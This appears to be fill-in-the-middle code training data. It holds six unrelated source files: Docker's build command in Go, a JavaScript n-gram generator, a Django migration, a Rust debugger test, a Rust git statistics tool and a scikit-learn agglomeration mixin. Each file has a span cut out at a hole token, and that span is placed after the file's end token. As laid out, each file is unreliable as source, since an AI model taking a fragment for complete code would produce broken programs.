<|file_name|>build.go<|end_file_name|><|fim▁begin|>package client import ( "archive/tar" "bufio" "encoding/base64" "encoding/json" "fmt" "io" "io/ioutil" "net/http" "net/url" "os" "os/exec" "path" "path/filepath" "regexp" "runtime" "strconv" "strings" "github.com/docker/docker/api" Cli "github.com/docker/docker/cli" "github.com/docker/docker/graph/tags" "github.com/docker/docker/opts" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/httputils" "github.com/docker/docker/pkg/jsonmessage" flag "github.com/docker/docker/pkg/mflag" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/progressreader" "github.com/docker/docker/pkg/streamformatter" "github.com/docker/docker/pkg/ulimit" "github.com/docker/docker/pkg/units" "github.com/docker/docker/pkg/urlutil" "github.com/docker/docker/registry" "github.com/docker/docker/utils" ) const ( tarHeaderSize = 512 ) // CmdBuild builds a new image from the source code at a given path. // // If '-' is provided instead of a path or URL, Docker will build an image from either a Dockerfile or tar archive read from STDIN. // // Usage: docker build [OPTIONS] PATH | URL | - func (cli *DockerCli) CmdBuild(args ...string) error { cmd := Cli.Subcmd("build", []string{"PATH | URL | -"}, "Build a new image from the source code at PATH", true) tag := cmd.String([]string{"t", "-tag"}, "", "Repository name (and optionally a tag) for the image") suppressOutput := cmd.Bool([]string{"q", "-quiet"}, false, "Suppress the verbose output generated by the containers") noCache := cmd.Bool([]string{"#no-cache", "-no-cache"}, false, "Do not use cache when building the image") rm := cmd.Bool([]string{"#rm", "-rm"}, true, "Remove intermediate containers after a successful build") forceRm := cmd.Bool([]string{"-force-rm"}, false, "Always remove intermediate containers") pull := cmd.Bool([]string{"-pull"}, false, "Always attempt to pull a newer version of the image") dockerfileName := cmd.String([]string{"f", "-file"}, "", "Name of the Dockerfile (Default is 'PATH/Dockerfile')") flMemoryString := cmd.String([]string{"m", "-memory"}, "", "Memory limit") flMemorySwap := cmd.String([]string{"-memory-swap"}, "", "Total memory (memory + swap), '-1' to disable swap") flCPUShares := cmd.Int64([]string{"c", "-cpu-shares"}, 0, "CPU shares (relative weight)") flCpuPeriod := cmd.Int64([]string{"-cpu-period"}, 0, "Limit the CPU CFS (Completely Fair Scheduler) period") flCpuQuota := cmd.Int64([]string{"-cpu-quota"}, 0, "Limit the CPU CFS (Completely Fair Scheduler) quota") flCPUSetCpus := cmd.String([]string{"-cpuset-cpus"}, "", "CPUs in which to allow execution (0-3, 0,1)") flCPUSetMems := cmd.String([]string{"-cpuset-mems"}, "", "MEMs in which to allow execution (0-3, 0,1)") flCgroupParent := cmd.String([]string{"-cgroup-parent"}, "", "Optional parent cgroup for the container") ulimits := make(map[string]*ulimit.Ulimit) flUlimits := opts.NewUlimitOpt(&ulimits) cmd.Var(flUlimits, []string{"-ulimit"}, "Ulimit options") cmd.Require(flag.Exact, 1) // For trusted pull on "FROM <image>" instruction. 
addTrustedFlags(cmd, true) cmd.ParseFlags(args, true) var ( context io.ReadCloser isRemote bool err error ) _, err = exec.LookPath("git") hasGit := err == nil specifiedContext := cmd.Arg(0) var ( contextDir string tempDir string relDockerfile string ) switch { case specifiedContext == "-": tempDir, relDockerfile, err = getContextFromReader(cli.in, *dockerfileName) case urlutil.IsGitURL(specifiedContext) && hasGit: tempDir, relDockerfile, err = getContextFromGitURL(specifiedContext, *dockerfileName) case urlutil.IsURL(specifiedContext): tempDir, relDockerfile, err = getContextFromURL(cli.out, specifiedContext, *dockerfileName) default: contextDir, relDockerfile, err = getContextFromLocalDir(specifiedContext, *dockerfileName) } if err != nil { return fmt.Errorf("unable to prepare context: %s", err) } if tempDir != "" { defer os.RemoveAll(tempDir) contextDir = tempDir } // Resolve the FROM lines in the Dockerfile to trusted digest references // using Notary. newDockerfile, err := rewriteDockerfileFrom(filepath.Join(contextDir, relDockerfile), cli.trustedReference) if err != nil { return fmt.Errorf("unable to process Dockerfile: %v", err) } defer newDockerfile.Close() // And canonicalize dockerfile name to a platform-independent one relDockerfile, err = archive.CanonicalTarNameForPath(relDockerfile) if err != nil { return fmt.Errorf("cannot canonicalize dockerfile path %s: %v", relDockerfile, err) } var includes = []string{"."} excludes, err := utils.ReadDockerIgnore(path.Join(contextDir, ".dockerignore")) if err != nil { return err } if err := utils.ValidateContextDirectory(contextDir, excludes); err != nil { return fmt.Errorf("Error checking context: '%s'.", err) } // If .dockerignore mentions .dockerignore or the Dockerfile // then make sure we send both files over to the daemon // because Dockerfile is, obviously, needed no matter what, and // .dockerignore is needed to know if either one needs to be // removed. The deamon will remove them for us, if needed, after it // parses the Dockerfile. Ignore errors here, as they will have been // caught by ValidateContextDirectory above. keepThem1, _ := fileutils.Matches(".dockerignore", excludes) keepThem2, _ := fileutils.Matches(relDockerfile, excludes) if keepThem1 || keepThem2 { includes = append(includes, ".dockerignore", relDockerfile) } context, err = archive.TarWithOptions(contextDir, &archive.TarOptions{ Compression: archive.Uncompressed, ExcludePatterns: excludes, IncludeFiles: includes, }) if err != nil { return err } // Wrap the tar archive to replace the Dockerfile entry with the rewritten // Dockerfile which uses trusted pulls. 
context = replaceDockerfileTarWrapper(context, newDockerfile, relDockerfile) // Setup an upload progress bar // FIXME: ProgressReader shouldn't be this annoying to use sf := streamformatter.NewStreamFormatter() var body io.Reader = progressreader.New(progressreader.Config{ In: context, Out: cli.out, Formatter: sf, NewLines: true, ID: "", Action: "Sending build context to Docker daemon", }) var memory int64 if *flMemoryString != "" { parsedMemory, err := units.RAMInBytes(*flMemoryString) if err != nil { return err } memory = parsedMemory } var memorySwap int64 if *flMemorySwap != "" { if *flMemorySwap == "-1" { memorySwap = -1 } else { parsedMemorySwap, err := units.RAMInBytes(*flMemorySwap) if err != nil { return err } memorySwap = parsedMemorySwap } } // Send the build context v := &url.Values{} //Check if the given image name can be resolved if *tag != "" { repository, tag := parsers.ParseRepositoryTag(*tag) if err := registry.ValidateRepositoryName(repository); err != nil { return err } if len(tag) > 0 { if err := tags.ValidateTagName(tag); err != nil { return err } } } v.Set("t", *tag) if *suppressOutput { v.Set("q", "1") } if isRemote { v.Set("remote", cmd.Arg(0)) } if *noCache { v.Set("nocache", "1") } if *rm { v.Set("rm", "1") } else { v.Set("rm", "0") } if *forceRm { v.Set("forcerm", "1") } if *pull { v.Set("pull", "1") } v.Set("cpusetcpus", *flCPUSetCpus) v.Set("cpusetmems", *flCPUSetMems) v.Set("cpushares", strconv.FormatInt(*flCPUShares, 10)) v.Set("cpuquota", strconv.FormatInt(*flCpuQuota, 10)) v.Set("cpuperiod", strconv.FormatInt(*flCpuPeriod, 10)) v.Set("memory", strconv.FormatInt(memory, 10)) v.Set("memswap", strconv.FormatInt(memorySwap, 10)) v.Set("cgroupparent", *flCgroupParent) v.Set("dockerfile", relDockerfile) ulimitsVar := flUlimits.GetList() ulimitsJson, err := json.Marshal(ulimitsVar) if err != nil { return err } v.Set("ulimits", string(ulimitsJson)) headers := http.Header(make(map[string][]string)) buf, err := json.Marshal(cli.configFile.AuthConfigs) if err != nil { return err } headers.Add("X-Registry-Config", base64.URLEncoding.EncodeToString(buf)) headers.Set("Content-Type", "application/tar") sopts := &streamOpts{ rawTerminal: true, in: body, out: cli.out, headers: headers, } serverResp, err := cli.stream("POST", fmt.Sprintf("/build?%s", v.Encode()), sopts) // Windows: show error message about modified file permissions. if runtime.GOOS == "windows" { h, err := httputils.ParseServerHeader(serverResp.header.Get("Server")) if err == nil { if h.OS != "windows" { fmt.Fprintln(cli.err, `SECURITY WARNING: You are building a Docker image from Windows against a non-Windows Docker host. All files and directories added to build context will have '-rwxr-xr-x' permissions. It is recommended to double check and reset permissions for sensitive files and directories.`) } } } if jerr, ok := err.(*jsonmessage.JSONError); ok { // If no error code is set, default to 1 if jerr.Code == 0 { jerr.Code = 1 } return Cli.StatusError{Status: jerr.Message, StatusCode: jerr.Code} } return err } // getDockerfileRelPath uses the given context directory for a `docker build` // and returns the absolute path to the context directory, the relative path of // the dockerfile in that context directory, and a non-nil error on success. 
func getDockerfileRelPath(givenContextDir, givenDockerfile string) (absContextDir, relDockerfile string, err error) { if absContextDir, err = filepath.Abs(givenContextDir); err != nil { return "", "", fmt.Errorf("unable to get absolute context directory: %v", err) } // The context dir might be a symbolic link, so follow it to the actual // target directory. absContextDir, err = filepath.EvalSymlinks(absContextDir) if err != nil { return "", "", fmt.Errorf("unable to evaluate symlinks in context path: %v", err) } stat, err := os.Lstat(absContextDir) if err != nil { return "", "", fmt.Errorf("unable to stat context directory %q: %v", absContextDir, err) } if !stat.IsDir() { return "", "", fmt.Errorf("context must be a directory: %s", absContextDir) } absDockerfile := givenDockerfile if absDockerfile == "" { // No -f/--file was specified so use the default relative to the // context directory. absDockerfile = filepath.Join(absContextDir, api.DefaultDockerfileName) // Just to be nice ;-) look for 'dockerfile' too but only // use it if we found it, otherwise ignore this check if _, err = os.Lstat(absDockerfile); os.IsNotExist(err) { altPath := filepath.Join(absContextDir, strings.ToLower(api.DefaultDockerfileName)) if _, err = os.Lstat(altPath); err == nil { absDockerfile = altPath } } } // If not already an absolute path, the Dockerfile path should be joined to // the base directory. if !filepath.IsAbs(absDockerfile) { absDockerfile = filepath.Join(absContextDir, absDockerfile) } // Evaluate symlinks in the path to the Dockerfile too. absDockerfile, err = filepath.EvalSymlinks(absDockerfile) if err != nil { return "", "", fmt.Errorf("unable to evaluate symlinks in Dockerfile path: %v", err) } if _, err := os.Lstat(absDockerfile); err != nil { if os.IsNotExist(err) { return "", "", fmt.Errorf("Cannot locate Dockerfile: %q", absDockerfile) } return "", "", fmt.Errorf("unable to stat Dockerfile: %v", err) } if relDockerfile, err = filepath.Rel(absContextDir, absDockerfile); err != nil { return "", "", fmt.Errorf("unable to get relative Dockerfile path: %v", err) } if strings.HasPrefix(relDockerfile, ".."+string(filepath.Separator)) { return "", "", fmt.Errorf("The Dockerfile (%s) must be within the build context (%s)", givenDockerfile, givenContextDir) } return absContextDir, relDockerfile, nil } // writeToFile copies from the given reader and writes it to a file with the // given filename. func writeToFile(r io.Reader, filename string) error { file, err := os.OpenFile(filename, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, os.FileMode(0600)) if err != nil { return fmt.Errorf("unable to create file: %v", err) } defer file.Close() if _, err := io.Copy(file, r); err != nil { return fmt.Errorf("unable to write file: %v", err) } return nil } // getContextFromReader will read the contents of the given reader as either a // Dockerfile or tar archive to be extracted to a temporary directory used as // the context directory. Returns the absolute path to the temporary context // directory, the relative path of the dockerfile in that context directory, // and a non-nil error on success. 
func getContextFromReader(r io.Reader, dockerfileName string) (absContextDir, relDockerfile string, err error) { buf := bufio.NewReader(r) magic, err := buf.Peek(tarHeaderSize) if err != nil && err != io.EOF { return "", "", fmt.Errorf("failed to peek context header from STDIN: %v", err) } if absContextDir, err = ioutil.TempDir("", "docker-build-context-"); err != nil { return "", "", fmt.Errorf("unbale to create temporary context directory: %v", err) } defer func(d string) { if err != nil { os.RemoveAll(d) } }(absContextDir) if !archive.IsArchive(magic) { // Input should be read as a Dockerfile. // -f option has no meaning when we're reading it from stdin, // so just use our default Dockerfile name relDockerfile = api.DefaultDockerfileName return absContextDir, relDockerfile, writeToFile(buf, filepath.Join(absContextDir, relDockerfile))<|fim▁hole|> if err := archive.Untar(buf, absContextDir, nil); err != nil { return "", "", fmt.Errorf("unable to extract stdin to temporary context directory: %v", err) } return getDockerfileRelPath(absContextDir, dockerfileName) } // getContextFromGitURL uses a Git URL as context for a `docker build`. The // git repo is cloned into a temporary directory used as the context directory. // Returns the absolute path to the temporary context directory, the relative // path of the dockerfile in that context directory, and a non-nil error on // success. func getContextFromGitURL(gitURL, dockerfileName string) (absContextDir, relDockerfile string, err error) { if absContextDir, err = utils.GitClone(gitURL); err != nil { return "", "", fmt.Errorf("unable to 'git clone' to temporary context directory: %v", err) } return getDockerfileRelPath(absContextDir, dockerfileName) } // getContextFromURL uses a remote URL as context for a `docker build`. The // remote resource is downloaded as either a Dockerfile or a context tar // archive and stored in a temporary directory used as the context directory. // Returns the absolute path to the temporary context directory, the relative // path of the dockerfile in that context directory, and a non-nil error on // success. func getContextFromURL(out io.Writer, remoteURL, dockerfileName string) (absContextDir, relDockerfile string, err error) { response, err := httputils.Download(remoteURL) if err != nil { return "", "", fmt.Errorf("unable to download remote context %s: %v", remoteURL, err) } defer response.Body.Close() // Pass the response body through a progress reader. progReader := &progressreader.Config{ In: response.Body, Out: out, Formatter: streamformatter.NewStreamFormatter(), Size: int(response.ContentLength), NewLines: true, ID: "", Action: fmt.Sprintf("Downloading build context from remote url: %s", remoteURL), } return getContextFromReader(progReader, dockerfileName) } // getContextFromLocalDir uses the given local directory as context for a // `docker build`. Returns the absolute path to the local context directory, // the relative path of the dockerfile in that context directory, and a non-nil // error on success. func getContextFromLocalDir(localDir, dockerfileName string) (absContextDir, relDockerfile string, err error) { // When using a local context directory, when the Dockerfile is specified // with the `-f/--file` option then it is considered relative to the // current directory and not the context directory. 
if dockerfileName != "" { if dockerfileName, err = filepath.Abs(dockerfileName); err != nil { return "", "", fmt.Errorf("unable to get absolute path to Dockerfile: %v", err) } } return getDockerfileRelPath(localDir, dockerfileName) } var dockerfileFromLinePattern = regexp.MustCompile(`(?i)^[\s]*FROM[ \f\r\t\v]+(?P<image>[^ \f\r\t\v\n#]+)`) type trustedDockerfile struct { *os.File size int64 } func (td *trustedDockerfile) Close() error { td.File.Close() return os.Remove(td.File.Name()) } // rewriteDockerfileFrom rewrites the given Dockerfile by resolving images in // "FROM <image>" instructions to a digest reference. `translator` is a // function that takes a repository name and tag reference and returns a // trusted digest reference. func rewriteDockerfileFrom(dockerfileName string, translator func(string, registry.Reference) (registry.Reference, error)) (newDockerfile *trustedDockerfile, err error) { dockerfile, err := os.Open(dockerfileName) if err != nil { return nil, fmt.Errorf("unable to open Dockerfile: %v", err) } defer dockerfile.Close() scanner := bufio.NewScanner(dockerfile) // Make a tempfile to store the rewritten Dockerfile. tempFile, err := ioutil.TempFile("", "trusted-dockerfile-") if err != nil { return nil, fmt.Errorf("unable to make temporary trusted Dockerfile: %v", err) } trustedFile := &trustedDockerfile{ File: tempFile, } defer func() { if err != nil { // Close the tempfile if there was an error during Notary lookups. // Otherwise the caller should close it. trustedFile.Close() } }() // Scan the lines of the Dockerfile, looking for a "FROM" line. for scanner.Scan() { line := scanner.Text() matches := dockerfileFromLinePattern.FindStringSubmatch(line) if matches != nil && matches[1] != "scratch" { // Replace the line with a resolved "FROM repo@digest" repo, tag := parsers.ParseRepositoryTag(matches[1]) if tag == "" { tag = tags.DEFAULTTAG } ref := registry.ParseReference(tag) if !ref.HasDigest() && isTrusted() { trustedRef, err := translator(repo, ref) if err != nil { return nil, err } line = dockerfileFromLinePattern.ReplaceAllLiteralString(line, fmt.Sprintf("FROM %s", trustedRef.ImageName(repo))) } } n, err := fmt.Fprintln(tempFile, line) if err != nil { return nil, err } trustedFile.size += int64(n) } tempFile.Seek(0, os.SEEK_SET) return trustedFile, scanner.Err() } // replaceDockerfileTarWrapper wraps the given input tar archive stream and // replaces the entry with the given Dockerfile name with the contents of the // new Dockerfile. Returns a new tar archive stream with the replaced // Dockerfile. func replaceDockerfileTarWrapper(inputTarStream io.ReadCloser, newDockerfile *trustedDockerfile, dockerfileName string) io.ReadCloser { pipeReader, pipeWriter := io.Pipe() go func() { tarReader := tar.NewReader(inputTarStream) tarWriter := tar.NewWriter(pipeWriter) defer inputTarStream.Close() for { hdr, err := tarReader.Next() if err == io.EOF { // Signals end of archive. tarWriter.Close() pipeWriter.Close() return } if err != nil { pipeWriter.CloseWithError(err) return } var content io.Reader = tarReader if hdr.Name == dockerfileName { // This entry is the Dockerfile. Since the tar archive was // generated from a directory on the local filesystem, the // Dockerfile will only appear once in the archive. 
hdr.Size = newDockerfile.size content = newDockerfile } if err := tarWriter.WriteHeader(hdr); err != nil { pipeWriter.CloseWithError(err) return } if _, err := io.Copy(tarWriter, content); err != nil { pipeWriter.CloseWithError(err) return } } }() return pipeReader }<|fim▁end|>
}
<|file_name|>ngram-process.js<|end_file_name|><|fim▁begin|>"use strict"; var filters = require('./filters'), uniq = require('uniq'); var doNgram = function doNgram (string, resultData, config) { var ngramCount = string.length - config.n + 1, ngram, previousNgram = null, ngramData, i; for (i = 0; i < ngramCount; i++) { ngram = string.substr(i, config.n); if (!resultData.elements[ngram]) { ngramData = resultData.elements[ngram] = { probabilityAsFirst: 0, children: {}, lastChildren: {} }; } else { ngramData = resultData.elements[ngram]; } if (i === 0) { ngramData.probabilityAsFirst++; } if (previousNgram !== null) { if (i === ngramCount - 1) { if (!previousNgram.lastChildren[ngram]) { previousNgram.lastChildren[ngram] = 1; } else { previousNgram.lastChildren[ngram]++; } } else { if (!previousNgram.children[ngram]) { previousNgram.children[ngram] = 1; } else { previousNgram.children[ngram]++; } } } previousNgram = ngramData; } }; var postProcessData = function postProcessData (resultData, compressFloat) { var keys = Object.keys(resultData.elements), childrenKeys, validFirst = {}, sumFirst = 0, sumChildren = 0, key, data, i, k; for (i = 0; i < keys.length; i++) { key = keys[i]; data = resultData.elements[key]; if (data.probabilityAsFirst > 0) { if (!validFirst[key]) { validFirst[key] = data.probabilityAsFirst; sumFirst += data.probabilityAsFirst; } else { validFirst[key] += data.probabilityAsFirst; sumFirst += data.probabilityAsFirst; } } delete data.probabilityAsFirst; childrenKeys = Object.keys(data.children); sumChildren = 0; for (k = 0; k < childrenKeys.length; k++) { sumChildren += data.children[childrenKeys[k]]; } for (k = 0; k < childrenKeys.length; k++) { data.children[childrenKeys[k]] /= sumChildren; data.children[childrenKeys[k]] = compressFloat(data.children[childrenKeys[k]]); } data.hasChildren = childrenKeys.length > 0; childrenKeys = Object.keys(data.lastChildren); sumChildren = 0; for (k = 0; k < childrenKeys.length; k++) { sumChildren += data.lastChildren[childrenKeys[k]]; } for (k = 0; k < childrenKeys.length; k++) { data.lastChildren[childrenKeys[k]] /= sumChildren; data.lastChildren[childrenKeys[k]] = compressFloat(data.lastChildren[childrenKeys[k]]); } data.hasLastChildren = childrenKeys.length > 0; } keys = Object.keys(validFirst); for (i = 0; i < keys.length; i++) { key = keys[i]; validFirst[key] /= sumFirst; validFirst[key] = compressFloat(validFirst[key]); } resultData.firstElements = validFirst; return resultData; }; var compact = function compact (resultData) { var keys = Object.keys(resultData.elements), ngramData, ngramDesc, i; for (i = 0; i < keys.length; i++) { ngramData = resultData.elements[keys[i]]; ngramDesc = [ ngramData.hasChildren ? ngramData.children : 0, ngramData.hasLastChildren ? 
ngramData.lastChildren : 0 ]; resultData.elements[keys[i]] = ngramDesc; } resultData.e = resultData.elements; resultData.fe = resultData.firstElements; delete resultData.elements; delete resultData.firstElements; }; var stringToRegExp = function stringToRegExp (string) { var match = string.match(/^\/(.+)\/([igmuy]+)$/), regex = null; if (match !== null) { regex = new RegExp(match[1], match[2]); } return regex; }; var preProcessString = function preProcessString (string, config) { string = string.toLowerCase(); if (config.filter) { var filterRegex = null; if (config.filter instanceof RegExp) { filterRegex = config.filter } else if (filters.hasOwnProperty(config.filter)) { filterRegex = filters[config.filter]; } else { filterRegex = stringToRegExp(config.filter); } if (filterRegex) { string = string.replace(filterRegex, ' '); } } var strings = string.split(/\s+/).filter(function (v) { return v.length > 0; }); if (config.minLength) { strings = strings.filter(function (v) { return v.length > config.minLength; }); } if (config.unique) { uniq(strings); } return strings; }; /** * Generate an n-gram model based on a given text * @param {string} data Text corpus as a single, preferably large, string * @param {object} config Configuration options * @param {string} [config.name] Name of the n-gram model, not directly used * @param {int} [config.n=3] Order of the model (1: unigram, 2: bigram, 3: trigram, ...) * @param {int} [config.minLength=n] Minimum length of the word considered in the generation of the model * @param {bool} [config.unique=false] Avoid skewing the generation toward the most repeated words in the text corpus * @param {bool} [config.compress=false] Reduce the size of the model file, making it slightly less accurate * @param {bool} [config.excludeOriginal=false] Include the full list of the words considered in the generation so they can be blacklisted * @param {string|RegExp} [config.filter='extended'] Character filtering option, either one the existing filters (none, alphabetical, numerical, alphaNumerical, extended, extendedNumerical, french, english, oldEnglish, chinese, japanese, noSymbols) or a RegExp object * @returns {object} N-gram model built from the text corpus */ module.exports = function generateModel (data, config) { config = config || {}; config.name = config.name || null; config.filter = config.filter || 'extended'; config.n = parseInt(config.n, 10) || 3; config.minLength = parseInt(config.minLength, 10) || config.n; config.unique = !!config.unique; config.excludeOriginal = !!config.excludeOriginal; config.compress = !!config.compress; if (config.minLength < config.n) { throw new Error('N-gram error: The minLength value must be larger than or equal to n'); } <|fim▁hole|> unique: config.unique ? 1 : 0, excludeOriginal: config.excludeOriginal ? 1 : 0 }; var resultData = { elements: {} }; var excludeData = []; var strings = preProcessString(data, config); for (var i = 0; i < strings.length; i++) { doNgram(strings[i], resultData, config); if (config.excludeOriginal && excludeData.indexOf(strings[i]) === -1) { excludeData.push(strings[i]); } } var formatFloat = config.compress ? function compressFloat (float, precision) { return parseFloat(float.toFixed(precision || 7)); } : function (v) { return v; }; compact(postProcessData(resultData, formatFloat)); return { config: resultConfig, data: resultData, exclude: excludeData.length ? excludeData : 0 }; };<|fim▁end|>
var resultConfig = { name: config.name, n: config.n, minLength: config.minLength,
<|file_name|>0031_auto_20170601_1502.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-06-01 12:02 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('website', '0030_github_user'), ] operations = [ migrations.AddField( model_name='linkedin_user', name='number_all_repos', field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='number_repos1', field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='number_repos2', field=models.IntegerField(default=0), ), migrations.AddField(<|fim▁hole|> field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='technology1', field=models.CharField(default='', max_length=50), ), migrations.AddField( model_name='linkedin_user', name='technology2', field=models.CharField(default='', max_length=50), ), migrations.AddField( model_name='linkedin_user', name='technology3', field=models.CharField(default='', max_length=50), ), ]<|fim▁end|>
model_name='linkedin_user', name='number_repos3',
<|file_name|>borrowed-struct.rs<|end_file_name|><|fim▁begin|>// Copyright 2013-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // ignore-android: FIXME(#10381) // compile-flags:-g // === GDB TESTS =================================================================================== // gdb-command:rbreak zzz // gdb-command:run // gdb-command:finish // gdb-command:print *stack_val_ref // gdb-check:$1 = {x = 10, y = 23.5} // gdb-command:print *stack_val_interior_ref_1 // gdb-check:$2 = 10 // gdb-command:print *stack_val_interior_ref_2 // gdb-check:$3 = 23.5 // gdb-command:print *ref_to_unnamed // gdb-check:$4 = {x = 11, y = 24.5} // gdb-command:print *unique_val_ref // gdb-check:$5 = {x = 13, y = 26.5} // gdb-command:print *unique_val_interior_ref_1 // gdb-check:$6 = 13 // gdb-command:print *unique_val_interior_ref_2 // gdb-check:$7 = 26.5 // === LLDB TESTS ================================================================================== // lldb-command:run // lldb-command:print *stack_val_ref // lldb-check:[...]$0 = SomeStruct { x: 10, y: 23.5 } // lldb-command:print *stack_val_interior_ref_1 // lldb-check:[...]$1 = 10 // lldb-command:print *stack_val_interior_ref_2 // lldb-check:[...]$2 = 23.5 // lldb-command:print *ref_to_unnamed // lldb-check:[...]$3 = SomeStruct { x: 11, y: 24.5 } // lldb-command:print *unique_val_ref<|fim▁hole|>// lldb-check:[...]$5 = 13 // lldb-command:print *unique_val_interior_ref_2 // lldb-check:[...]$6 = 26.5 #![allow(unused_variable)] struct SomeStruct { x: int, y: f64 } fn main() { let stack_val: SomeStruct = SomeStruct { x: 10, y: 23.5 }; let stack_val_ref: &SomeStruct = &stack_val; let stack_val_interior_ref_1: &int = &stack_val.x; let stack_val_interior_ref_2: &f64 = &stack_val.y; let ref_to_unnamed: &SomeStruct = &SomeStruct { x: 11, y: 24.5 }; let unique_val = box SomeStruct { x: 13, y: 26.5 }; let unique_val_ref: &SomeStruct = &*unique_val; let unique_val_interior_ref_1: &int = &unique_val.x; let unique_val_interior_ref_2: &f64 = &unique_val.y; zzz(); // #break } fn zzz() {()}<|fim▁end|>
// lldb-check:[...]$4 = SomeStruct { x: 13, y: 26.5 } // lldb-command:print *unique_val_interior_ref_1
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>extern crate git2; extern crate chrono; #[macro_use] extern crate serde_derive; extern crate docopt; extern crate core; extern crate regex; #[macro_use] extern crate prettytable; #[cfg(test)] extern crate tempdir; use docopt::Docopt; mod snapshot; mod heatmap; mod mailmap; mod personal; #[cfg(test)] mod test; #[derive(Debug, Deserialize)] pub struct Args { arg_path: String } #[cfg(not(test))] fn main() { const USAGE: &'static str = " usage: gitostat [options] <path> Options: -h, --help show this message "; let args: Args = Docopt::new(USAGE) .and_then(|d| d.deserialize()) .unwrap_or_else(|e| e.exit()); match gitostat::run(&args) { Ok(()) => {}, Err(e) => println!("error: {}", e) } } macro_rules! error( ($($arg:tt)*) => ( use std::io::Write; match writeln!(&mut ::std::io::stderr(), $($arg)* ) { Ok(_) => {}, Err(x) => panic!("Unable to write to stderr: {}", x), } ) ); #[macro_export] /// converts errors into None and output them into stderr. macro_rules! otry { ($e:expr) => (match $e { Ok(e) => e, Err(e) => { error!("ERROR!: {:?} {} {}", e, file!(), line!()); return None } }) } mod gitostat { use git2; use std::cmp; use std::path::Path; use std::collections::BTreeMap; use Args; use snapshot::HasSnapshot; use heatmap::Heatmap; use mailmap::Mailmap; use personal::PersonalStats; pub fn run(args: &Args) -> Result<(), git2::Error> { let path = Path::new(&args.arg_path); let repo = git2::Repository::open(path)?; let mailmap = Mailmap::new(&path.join(".mailmap")); self::info(&repo, mailmap.as_ref()) } fn info(repo: &git2::Repository, mailmap: Option<&Mailmap>) -> Result<(), git2::Error> { let mut revwalk = repo.revwalk()?; revwalk.push_head()?; revwalk.set_sorting(git2::SORT_TOPOLOGICAL); let commits: Vec<git2::Commit> = revwalk.filter_map(|oid| { // trying lookup commit in repo, skip if any error let commit = otry!(repo.find_commit(otry!(oid))); // also skip merge-commits if commit.parents().len() > 1 { return None; } Some(commit) }).collect(); let mut heatmap = Heatmap::new(); let mut authors = PersonalStats::new(&repo); let mut num_files: BTreeMap<String, usize> = BTreeMap::new(); for (i, commit) in commits.iter().enumerate() { print!("[{}/{}]\r", i+1, commits.len()); heatmap.append(&commit.author().when()); authors.append(&commit, mailmap)?; let files = repo.snapshot(&commit, false)?; let key = format!("{}", files.datetime.format("%Y-%W")); let number = num_files.entry(key).or_insert(0); *number = cmp::max(*number, files.len()); } println!(""); if let Some(commit) = commits.first() { // skip binary files because they don't counted in diffs let files = repo.snapshot(commit, true)?; authors.blame(&files, mailmap)?; println!("Scaned {}", files.len()); } let mut vec: Vec<usize> = num_files.values().cloned().collect(); vec.sort_by(|a, b| b.cmp(a)); let max = cmp::max(1, vec[0]); const WIDTH: usize = 60; let coeff = if max > WIDTH { WIDTH as f32 / max as f32 } else { 1f32 }; println!("Files in repo:"); for (key, &val) in &num_files { let value = (val as f32 * coeff).round() as usize; let bar = (0..value).map(|_| "░").collect::<String>(); println!("{} {:3} {}", key, val, bar + "▏"); } println!(""); println!("{}", heatmap); println!("{}", authors); Ok(())<|fim▁hole|><|fim▁end|>
} }
<|file_name|>_feature_agglomeration.py<|end_file_name|><|fim▁begin|>""" Feature agglomeration. Base classes and functions for performing feature agglomeration. """ # Author: V. Michel, A. Gramfort # License: BSD 3 clause import numpy as np from ..base import TransformerMixin from ..utils import array2d ############################################################################### # Mixin class for feature agglomeration. class AgglomerationTransform(TransformerMixin): """ A class for feature agglomeration via the transform interface """ def transform(self, X, pooling_func=np.mean): """ Transform a new matrix using the built clustering Parameters --------- X : array-like, shape = [n_samples, n_features] A M by N array of M observations in N dimensions or a length M array of M one-dimensional observations. pooling_func : a function that takes an array of shape = [M, N] and return an array of value of size M. Defaut is np.mean """ X = array2d(X) nX = [] if len(self.labels_) != X.shape[1]: raise ValueError("X has a different number of features than " "during fitting.") for l in np.unique(self.labels_): nX.append(pooling_func(X[:, self.labels_ == l], axis=1)) return np.array(nX).T def inverse_transform(self, Xred): """ Inverse the transformation. Return a vector of size nb_features with the values of Xred assigned to each group of features Parameters ---------- Xred : array of size k The values to be assigned to each cluster of samples Returns ------- X : array of size nb_samples A vector of size nb_samples with the values of Xred assigned to each of the cluster of samples. """ if np.size((Xred.shape)) == 1:<|fim▁hole|> for i in range(len(unil)): if np.size((Xred.shape)) == 1: X[self.labels_ == unil[i]] = Xred[i] else: X[:, self.labels_ == unil[i]] = array2d(Xred[:, i]).T return X<|fim▁end|>
X = np.zeros([self.labels_.shape[0]]) else: X = np.zeros([Xred.shape[0], self.labels_.shape[0]]) unil = np.unique(self.labels_)
